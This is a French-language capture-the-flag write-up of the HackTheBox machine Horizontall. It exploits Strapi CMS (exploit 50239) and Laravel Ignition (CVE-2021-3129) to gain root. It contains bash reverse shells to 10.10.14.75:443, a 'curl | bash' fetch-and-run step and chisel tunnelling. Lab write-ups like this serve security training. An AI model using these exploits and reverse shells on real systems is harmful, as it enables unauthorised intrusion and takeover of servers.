Horizontall HackTheBox (WriteUp)

Skills:

Information Leakage
Port Forwarding
Strapi CMS Exploitation
Laravel Exploitation

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.105 -oG allPorts

Scan de la version des ports avec Nmap 22,80:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.11.105 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP

Scan Port 80

Fuzzing Sous-Domaines (gobuster)

Nous lançons ensuite une recherche de sous-domaines avec Gobuster :

gobuster vhost -u http://horizontall.htb/ --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100

Nous trouvons un sous-domaine intéressant : api-prod.horizontall.htb.

Nous l'ajoutons à /etc/hosts

Fuzzing des Directoires API

Nous effectuons une analyse des répertoires accessibles sur le sous-domaine API :

gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Nous trouvons :

admin
users
reviews

gobuster dir -u http://api-prod.horizontall.htb/Users/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Exploitation du CMS Strapi (RCE)

Nous recherchons une vulnérabilité pour Strapi avec searchsploit :

searchsploit -m multiple/webapps/50239.py

Nous utilisons l'exploit :

python3 50239.py http://api-prod.horizontall.htb

Cela nous fournit des identifiants administrateur

[+] Your email is: [email protected]
[+] Your new credentials are: admin:SuperStrongPassword1 
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQwNjk2NzU1LCJleHAiOjE3NDMyODg3NTV9.WMksWcYjinav1IGH6KHOU0tleELdaY2Wmy2-WufxGm0

Nous récupérons un hash de mot de passe de l'user qui vient d'être créer :

admin
$2a$10$y5rS5PnHngnev02rnXIpF.a26DYsqCeSvPrLkKU1Go1Wp4.LTUhj6

Obtention d'un Shell Inversé

Nous créons un index.html contenant un payload de reverse shell :

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.75/443 0>&1

Nous lançons un serveur web :

python3 -m http.server 80

Nous ouvrons une connexion d'écoute :

nc -nlvp 443

Puis nous exécutons le payload sur la cible :

curl http://10.10.14.75:80 | bash

Nous stabilisons notre shell :

script /dev/null -c bash
#contrôle Z


reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Flag user.txt :)

Élévation de Privilèges

Nous avons ensuite listé les ports ouverts sur la machine cible pour vérifier la présence du port 8000 :

netstat -tuln

Puis, nous avons utilisé curl pour tester l'accès au service sur le port 8000 :

curl 127.0.0.1:8000

Nous avons alors observé la présence du CMS Laravel.

Port Forwarding chisel port 8000

Nous avons d'abord compilé Chisel sur notre machine locale :

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub

Ensuite, nous avons transféré l'exécutable Chisel vers la machine victime via un serveur HTTP Python3

go build -ldflags "-s -w" .
upx chisel

Ensuite, nous avons transféré l'exécutable Chisel vers la machine victime via un serveur HTTP Python3

python3 -m http.server 8080
wget http://10.10.14.75:8080/chisel

Sur notre machine, nous avons démarré le serveur Chisel :

./chisel server -p 9000 -reverse

Puis, sur la machine victime, nous avons configuré le client Chisel pour rediriger le port 8000 vers notre machine locale :

./chisel client 10.10.14.75:9000 R:8000:127.0.0.1:8000

Exploitation de Laravel CMS (CVE-2021-3129)

GitHub - 0x0d3ad/CVE-2021-3129: CVE-2021-3129 (Laravel Ignition RCE Exploit)GitHub

Exécution de commandes arbitraires

Nous exploitons la vulnérabilité CVE-2021-3129 pour exécuter des commandes arbitraires sur le serveur. Tout d'abord, nous testons l'exécution en lançant la commande id :

python3 CVE-2021-3129.py http://0.0.0.0:8000/ --cmd 'id'

La sortie confirme que nous avons les privilèges root.

Flag root.txt :)

Une fois l'accès confirmé, nous récupérons le flag en lisant le fichier /root/root.txt :

python3 CVE-2021-3129.py http://0.0.0.0:8000/ --cmd 'cat /root/root.txt'

Obtention d'un accès interactif (Reverse Shell)

Pour obtenir un shell interactif, nous configurons un listener sur le port 443 :

nc -nvlp 443

Ensuite, nous exécutons une reverse shell sur la cible en utilisant l'exploit :

python3 CVE-2021-3129.py http://0.0.0.0:8000/ --cmd 'bash -c "bash -i >&/dev/tcp/10.10.14.75/443 0>&1"'

Nous obtenons alors un accès root sur la machine cible.

Mis à jour il y a 12 mois

hashtagReconnaissance

hashtagScan Port 80

hashtagFuzzing Sous-Domaines (gobuster)

hashtagFuzzing des Directoires API

hashtagExploitation du CMS Strapi (RCE)

hashtagObtention d'un Shell Inversé

hashtagNous stabilisons notre shell :

hashtagFlag user.txt :)

hashtagÉlévation de Privilèges

hashtagPort Forwarding chisel port 8000

hashtagExploitation de Laravel CMS (CVE-2021-3129)

hashtagExécution de commandes arbitraires

hashtagFlag root.txt :)

hashtagObtention d'un accès interactif (Reverse Shell)